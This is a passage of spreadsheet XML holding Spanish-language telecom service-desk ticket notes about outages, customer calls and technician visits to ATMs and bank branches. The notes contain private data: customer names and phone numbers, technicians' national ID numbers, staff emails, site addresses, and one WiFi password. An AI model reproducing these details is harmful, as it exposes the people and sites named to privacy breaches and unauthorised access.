SE MANDA DATOS DEL PERSONAL TÉCNICO QUE ESTARÁ REALIZANDO LA VISITA., SIEMPRE QUEDAMOS ATENTOS NOS PUEDAN INDICAR EL DÍA Y HORA QUE SE DEBE REALIZAR LA VISITA.
TECNICO ASIGNADO:
LUDWING EDUARDO, DE LEON LOPEZ IBM: 53019 DPI: 2359927711220
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4570289</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE USIEL ZELEDON 87104459 MENCIONA QUE PERSISTE EL INCONENIENTE, SE LE BRINDA A CLIENTE LOS CORREOS PARA QUE PUEDA COMPARTIR LAS PRUEBAS
-ID 3001969059</t>
  </si>
  <si>
    <t>F4570295</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE BARAHONA, QUIEN INDICA QUE NO ESTA EN LAS INSTALACIONES PERO LE ENVIARON FOTOS DEL EQUIPO E INDICA QUE NO ESTA ALARMADO.
PWR EN VERDE SHDLS 1 EN VERDE. INDICA QUE YA REINCIO LA PBX. Y QUE SU HORARIO DE ATENCION ES HASTA LAS 17:00HRS.
3001965267
COLA:
NOMBRE: A: 0050370395363
NÚMERO: 0050370395363
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 0050370395363
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/05/2022 14:24:55</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JORGE BARAHONA, SE LE INDICO DE LO ANTERIOR, INDICA QUE ESTARA ESPERANDO LA LLEGA DEL TEC. EL DIA DE MAÑANA A LAS 8:00AM
3001971509
COLA:
NOMBRE: A: 0050370395363
NÚMERO: 0050370395363
DURACIÓN: 0:00:14
ESTADO: MARCANDO
DETALLES: 0050370395363
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 19/05/2022 14:43:15</t>
  </si>
  <si>
    <t>F4570303</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KEVIN POITAN AL 31046580 INDICA QUE AUN PERSISTE EL INCONVENIENTE YA QUE SE LEVANTA UN RATO Y VUELVE A CAER || SE NOTIFICA A GESTOR **
ID 1001012777
**</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON KEVIN POITAN/CLIENTE 31046580 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4570312</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA NO LA RETOMAN SE INTENTARA LUEGO **
ID 1001014375
**</t>
  </si>
  <si>
    <t>F4570313</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ALEJANDRA ESCOBEDO/EJECUTIVA CLARO; SE LE INFORMA QUE ENLACE OK; ADICIONAL SE CONSULTA AVANCES A GESTOR ASIGNADO VÍA SKYPE, INDICA QUE YA LO ESTÁ VERIFICANDO.</t>
  </si>
  <si>
    <t>F4570321</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  DIEGO HERNANDEZ 31916100 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001022229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  DIEGO HERNANDEZ AL 31916100  NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001015754
**</t>
  </si>
  <si>
    <t>F4570323</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE HONEY LAZO, QUIEN INDICA QUE YA SE APLICO REINICIO A LOS EQUIPOS PERO SERVICIO NO RESTABLECE, POR LO QUE SE COORDINARA VISITA, SE PROCEDE A LLENAR FORMATO
NÚMERO: 0050582062447
FIN: HOY, 15:20
ID DE LLAMADA: 3001986463</t>
  </si>
  <si>
    <t>F4570341</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE SERGIO SANTAMARIA, QUIEN INDICA QUE ESTARA EN SITIO PARA VALIDAR PRUEBAS DE PRIMER NIVEL EN 30 MINUTOS, POR LO QUE SOLICITA LLAMADA EN ESE TIEMPO.
1001097470
COLA:
NOMBRE: A: 0050378446609
NÚMERO: 0050378446609
DURACIÓN: 0:03:19
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050378446609
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 20/05/2022 08:32:34</t>
  </si>
  <si>
    <t>F4570343</t>
  </si>
  <si>
    <t>SE LLAMA A EVELIN PARA VALIDAR SERVICIO SIN EMBARGO NO RESPONDE--- ENVIA A BUZON
55884373</t>
  </si>
  <si>
    <t>F4570371</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN DE LEON 51820752 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001102474</t>
  </si>
  <si>
    <t>F4570372</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN Y ATIENDE ROSIBEL, CLIENTE COMENTA QUE YA ESTAN RECIBIENDO LLAMADAS. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE WILLIAM VILLALTA 61212610, SE LE SOLICITA AL CLIENTE UBICAR LOS EQUIPOS DE CLARO,</t>
  </si>
  <si>
    <t>CLIENTE REINICIA SU PLANTA PBX PER EL INCONVENIENTE PERSISTE, LOGRA UBICAR EQUIPO ASMI54 EL CUAL SE ENCUENTRA SINCRONIZADO, CLIENTE INDICA QUE EL INCONVENIENTE INICIÓ LUEGO DE UN APAGÓN DE ENERGÍA. 1001102546
PWR   VERDE
SYNC 1 VERDE</t>
  </si>
  <si>
    <t>F4570378</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:51
PARA: WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;; MESA DE SERVICIO TI &lt;MESADESERVICIOTI@SOMOSCMI.COM&gt;
ASUNTO: RE: G418 - ENLACE CLARO - ID 770600217T
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  PG418 ,CENTRO COMERCIAL PLAZA ELENA LOCAL 12 , 2DA CALLE 2-64 ZONA 1 ALDEA SANTA ELENA BARILLA GUATE
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
HECTOR ROLANDO ALINAN PORON  IBM:10629          DPI:2360728700208 CEL:58263125
RENE CAMEROS COJON                       IBM:532597        DPI:2275160010101 CEL:58264398
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  EDGAR SOYOS AL 44095770 CLIENTE INDICA QUE YA REINICIO EQUIPO Y NO LEVANTA LAS LUCES ESTAN ENCENDIDAS LAS DE GE4 Y GE0 SYS  ESTAN PARPADEANDO EN COLOR VERDE INDICA || SE NOTIFICA A GESTOR **
ID 1001018583
**</t>
  </si>
  <si>
    <t>SE LLAMA A JUAN SEBAYA PARA REALIZAR PRUEBAS SIN EMBARGO NO RESPONDE---
46111326</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JUAN SABAYA 46111326 INDICA QUE HOY ESTA DE DESCANSO QUE SE LE LLAME AL SEÑOR EDGAR SOYOS 44095770 **
ID 1001017965
**</t>
  </si>
  <si>
    <t>SE LLAMA A RICARDO PARA SEGUIMIENTO DEL CASO SIN EMBARGO NO RESPONDE...-- ENVIA DIRECTO A BUZON--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 Y SE COLOCA EN CONFERENCIA JUAN SABAYA 46111326  MENCIONA QUE NO SE NECESITAN PERMISOS PARA PERSONAL TECNICO
-ID 1001259492</t>
  </si>
  <si>
    <t>4210-4577 &gt;&gt; SE LLAMO A RICARDO PRA QUE NOS APOYE CON PRUEBAS PERO NO RESPONDE ENVIA A BUZON--</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DEL PR:
JUAN SABAYA 46111326 ID: 1001186366 NO RESPONDE
EDGAR SOYOS 44095770 ID: 1001186558 ENVIA A BUZÓN DE VOZ
RICARDO POITAN 42104577 ID: 1001186663 ATIENDE JUAN SABAYA E INDICA QUE YA ESTA EN LÍNEA CON EL GESTOR POR LO QUE SE LE INDICA QUE SE DARÁ SEGUIMIENTO POR ESA LLAMADA Y SE FINALIZA ESTA*/*/*/</t>
  </si>
  <si>
    <t>F4570381</t>
  </si>
  <si>
    <t>***SE LLAMA A CLIENTE RONY SUNUM AL 77941000  CONTESTA LA SEÑORITA CARMEN CONFIRMA SERVICIO ESTABLE
Y OPERATIVO **
ID |001020722
**</t>
  </si>
  <si>
    <t>F4570402</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR CASTRO AL 72681515 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001021586
**</t>
  </si>
  <si>
    <t>F4570420</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0420
ID: 349900386T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_EL_DURAZNO
UBICADO EN:  INTERNET.- LOTE 182 SECTOR 1 COL. SAN MARTIN CHINAUTLA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4570438</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 MENCIONA QUE AUN NO HA LLEGADO A SU OFICINA POR LO QUE SOLICITA LLAMDA PRA LAS  9:15
-ID 1001098086</t>
  </si>
  <si>
    <t>F4570443</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SURY MIRANDA  72375471//71803002 INFORMA QUE NO PODÍA REALIZAR NI RECIBIR LLAMADAS, PERO EL SERVICIO YA NORMALIZO, SOLICITA LLAMADA EL DÍA DE MAÑANA A LAS 13:00 HORAS</t>
  </si>
  <si>
    <t>F4570469</t>
  </si>
  <si>
    <t xml:space="preserve">
SE LLAMA A CLIENTE MELVIN 98095777 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001088124</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE MELVIN, QUIEN INDICA QUE YA NO SE TIENE INCONVENIENTES CON EL SERVICIO , Y AUTORIZA CIERRE DE CASO.
1001115207
COLA:
NOMBRE: A: 0050498095777
NÚMERO: 0050498095777
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050498095777
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 20/05/2022 09:30:40</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE QUIEN INDICA QUE PROBARA LA CONEXIONES DE SSID UNINSA CON PASS CLARO+2022 (C EN MAYUSCULA) SOLICITA 15 MINUTOS QUE NO ESTA EN SITIO--</t>
  </si>
  <si>
    <t>F4570470</t>
  </si>
  <si>
    <t>SIN RESPUESTA POR PARTE DE CLIENTE AL CORREO ENVIADO, QUEDAREMOS A LA ESPERA DE RESPUEST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0470
ID: 47503484T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM4280
UBICADO EN:  CAJERO 4280_3 CALLE 9-40 ZONA 2 SAN JOSE VILLA NUEVA GUATEMALA (C.C. EL PILAR)
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4570472</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253  MENCIONA QUE PERSISTE  EL PROBLEMA, SE LE SOLICITA PUEDA ENVIAR LAS PRUEBAS POR CORREO
-ID 1001177403</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE 22437253 MENCIONA QUE  YA TODO ESTA FUNCIONANDO BIEN PERO SOLICITA LLAMADA PARA EL MEDIO DIA
-ID 1001089029</t>
  </si>
  <si>
    <t>NO SE VALIDA LO QUE ESTA PENDIENTE POR EL CLIENTE Y NO TIENE GESTIÓN DESDE EL DÍA  20/05/2022 17:13:41 SE CAMBIA A WIP, FAVOR DE INDICAR QUE ES LO PENDIENTES DEL CLIENTE PARA NO CAMBIAR DE ESTADO.</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL 22437253 ID: 1001189547 ATIENDE PABLO, INDICA QUE VALIDARÁ CON PERSONA A CARGO DEL CASO E INFORMA QUE NO ESTA HASTA LAS 3, POR LO QUE SOLICITA QUE SE DEJE EN MONITOREO HASTA LAS 15:00 HRS*/*/*/*/SE NOTIFICA A GESTOR LUVY.SANDOVAL*/*/*/</t>
  </si>
  <si>
    <t>F4570475</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, PARA PROGRAMAR LA VISITA PARA EL DIA DE MAÑANA A LAS 21/05/22 A LAS 10.00 AM
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:49
PARA: CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; OPERADORES ATM TAVSA &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUENA TARDE
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE LAMENTAMOS MUCHOS LOS INCONVENIENTES, CON RESPECTO A LA VISITA, SOLICITAMOS DE SU APOYO EN PROGRAMAR  VISITA PARA EL DÍA DE MAÑANA  21/05/22 A LAS 10:00 AM.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE , SOLICITANDO LOS PERMISOS DE INGRESO  PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA N SITIO A LAS  14: HRS // QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 12:19
PARA: MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE, CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO EL DÍA DE HOY 20/05/2022  A LAS  14:00 HRS
DIRECCIÓN:  (ATM 4152) AGENCIA BAM PUERTA PARADA - KM. 14.5 CARRETERA A EL SALVADOR, C.C. ESCALA, GUATEMALA
ADJUNTAMOS LOS DATOS DE LOS TÉ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S COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL RESPONDE EDDY MENCIONA QUE SI ES NECESARIO GESTIONAR PERMISOS POR LO QUE SOLICITA SE COMPARTA POR CORREO LOS DATOS DE PERSONAL TECNICO - HORA Y FECHA
-ID 1001100393</t>
  </si>
  <si>
    <t>CLIENTE  CONFIRMA VISITA PARA LAS 10.0 0 AM , DEL DIA DE MAÑANA SABADO 21
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 17:35
PARA: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUENA TARDE
ESTIMADO CLIENTE, LE AGRADECEMOS LA COMPRESIÓN, PERSONAL TÉCNICO YA SE ENCUENTRA ENTERADO DE LA VISITA A LAS 10:00 AM.
SALUDOS CORDIALES.
DE: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:53
PARA: LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUEN DÍA
SE CONFIRMA VISITA PARA EL DIA DE MAÑANA A LAS 10:00 A.M.
SALUDOS CORDIALES.
DE: LUIS GALINDO &lt;LGALINDO@5B.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:51
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUENA TARDE @OPERADORES ATM 3
CONFIRMAR EL ATM 4152
NOTA
BUENA TARDE
ESTIMADO CLIENTE, DANDO SEGUIMIENTO AL INCIDENTE LAMENTAMOS MUCHOS LOS INCONVENIENTES, CON RESPECTO A LA VISITA, SOLICITAMOS DE SU APOYO EN PROGRAMAR  VISITA PARA EL DÍA DE MAÑANA  21/05/22 A LAS 10:00 AM.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: SÁBADO, 21 DE MAYO DE 2022 13:26
PARA: OPERADORES ATM 3 &lt;OPERADORES.ATM3@TAV.COM.GT&gt;; JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; LGALINDO@5B.COM.GT &lt;LGALINDO@5B.COM.GT&gt;; CEDELEON@5B.COM.GT &lt;CEDELEON@5B.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; FALLAS@5B.COM.GT &lt;FALLAS@5B.COM.GT&gt;; TELECOMUNICACIONES &lt;TTI@5B.COM.GT&gt;; OPERADORESATM &lt;OPERADORES.ATM@TAV.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS (ATM 4152) | 806300403T | CC_TYT_GT_ATM4152
BUENAS NOCHES APRECIABLE CLIENTE
LE ACTUALIZAMOS SOBRE LA VISITA EJECUTADO EL DIA DE HOY.
PERSONAL TÉCNICO REALIZO CERTIFICACION DE FIBRA OPTICA, SE DETERMINO QUE EL PATCHCORD
DE FIBRA EN EL ATM SE ENCONTRABA DOBLADO Y SE PROCEDIO A REEMPLAZARLO.
ADICIONAL A ELLOS SE REALIZO LIMPIEZA DE FIBRA Y JUMPERS QUEDANDO LOS NIVELES DE FIBRA ESTABLES.
FAVOR SU APOYO VALIDANDO EL CORRECTO FUNCIONAMIENTO DEL EQUIPO UPS YA QUE NO SE OBSERVA RESPALDO A LOS EQUIPOS, ACTUALMENTE EL SERVICIO OPERATIVO.</t>
  </si>
  <si>
    <t>F4570486</t>
  </si>
  <si>
    <t>CLIENTE ZULEYMA PINEDA 78778276 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4570499</t>
  </si>
  <si>
    <t>SE NTIFICA ALARMA EN EL MONITOREO PROACTIVO, SERVICIO CAIDO
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM486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0499
ID: 47504180T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM4860
UBICADO EN: CAJERO 4860_KM 70 LOCAL 1, 2 Y 3 MASAGUA ESCUINTLA_SUPER 24 MASAGUA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4570522</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 19 DE MAYO DE 2022 17:16PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_038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0522
ID: 8902285T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_0383
UBICADO EN:  CALLE PRINCIPAL ALDEA LAS ESCOBAS SAN MARTIN JILOTEPEQUE CHIMALTENANGO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4570523</t>
  </si>
  <si>
    <t>SE NOTIFICA ENLACE CAIDO EN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0523
ID: 8900827T
IDENTIFICADOR DEL CLIENTE: CC_BANRURAL_GT_AGENCIA_0756
UBICADO EN: CALLE PRINCIPAL HACIA COL. 1 DE MAYO 11-50 ZONA 11 MIXCO LO DE FUENTES
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4570545</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE, ADICIONAL SE LES PIDE QUE NOS INCLUYAN EN LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>-* SE HABLA CON WILVER GABRIEL (CLIENTE) INFORMA QUE EL INCONVENIENTE ES CON LA RUTA DE RETORNO YA QUE SI TIENE CONEXION DE LA CENTRAL AL PR PERO NO DEL PR A LA CENTRAL SOLICITA SE VERIFIQUE LA CONEXION LAN TO LAN, SE NOTIFICA ESTO A SAMUEL ESTRADA (GESTOR) COMENTA QUE VERIFICARÁ Y LLAMARÁ AL CLIENTE EN BREVE -*
-*</t>
  </si>
  <si>
    <t>SE LE LLAMA AL PR WILBERT GABRIEL AL 55110989 ID 1001132312 EL ATIENDE,   SE LE  BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE SI ENVÍO EL CORREO A N1 Y A CNOC Y NO NOS COPIO, SE LE PIDE DE APOYO QUE NOS COPIE Y SE CONTACTA CON EL GESTOR GERSON.AJPACAJA AL 8126 ID 1001134379 ATIENDE LUVY SANDOVAL SE LE EXPLICA Y COMENTA QUE SI TIENE EL CORREO POR LO QUE SE CAMBIA DE ESTADO Y SE NOTIFICA AL GESTOR VIA SKYPE.</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON WILBERTH GABRIEL/CLIENTE 55110989 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4570548</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO A CLIENTE
RE: REPORTE DE INTERMITENCIA CON TEG 01 - TONCONTIN 192.168.31.0/24
BUENA DIA,
CON RESPECTO AL SEGUIMIENTO DEL CASO ADJUNTO IP DE MAYOR CONSUMO ACTUALMENTE, HASTA EL MOMENTO NO SE DETECTA QUE SOBRE PASEN EL CONSUMO A 1MB.
FARSIMAN_AEROPUERTO_TGU#SHOW IP FLOW TOP
SRCIF         SRCIPADDRESS    DSTIF         DSTIPADDRESS    PR SRCP DSTP BYTES
VL1           192.168.31.40   GI0           10.0.0.2        06 0599 E148   269K
GI0           192.168.253.98  VL1*          192.168.31.40   06 0599 3B7F   185K
VL1           192.168.31.40   GI0           192.168.8.214   06 0599 E669   144K
GI0           10.0.0.2        VL1*          192.168.31.40   06 0599 9130    46K
GI0           192.168.8.214   VL1*          192.168.31.40   06 E669 0599    23K
VL1           192.168.31.40   GI0           10.0.0.2        06 0599 E37E    19K
VL1           192.168.31.40   GI0           192.168.1.107   06 192B CA72    16K
GI0           192.168.1.231   VL1*          192.168.31.40   06 2328 4C48    16K
GI0           149.154.167.220 VL1*          192.168.31.40   06 01BB 802F    15K
VL1           192.168.31.40   GI0           192.168.253.98  06 3B7F 0599    15K
10 OF 10 TOP TALKERS SHOWN. 454 FLOWS PROCESSED.
EN ESPERA DE SUS COMENTARIOS.
SALUDOS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE  PARA VALIDACION-
RE: REPORTE DE INTERMITENCIA CON TEG 01 - TONCONTIN 192.168.31.0/24</t>
  </si>
  <si>
    <t>F4570551</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE BENJAMIN ORELLANA 76970726 A QUIEN SE LE BRINDA LAS IP, MENCIONA QUE SI PRESENTA ALGUN PROBLEMA SE CONTACTARA CON CC
-ID 1001091558</t>
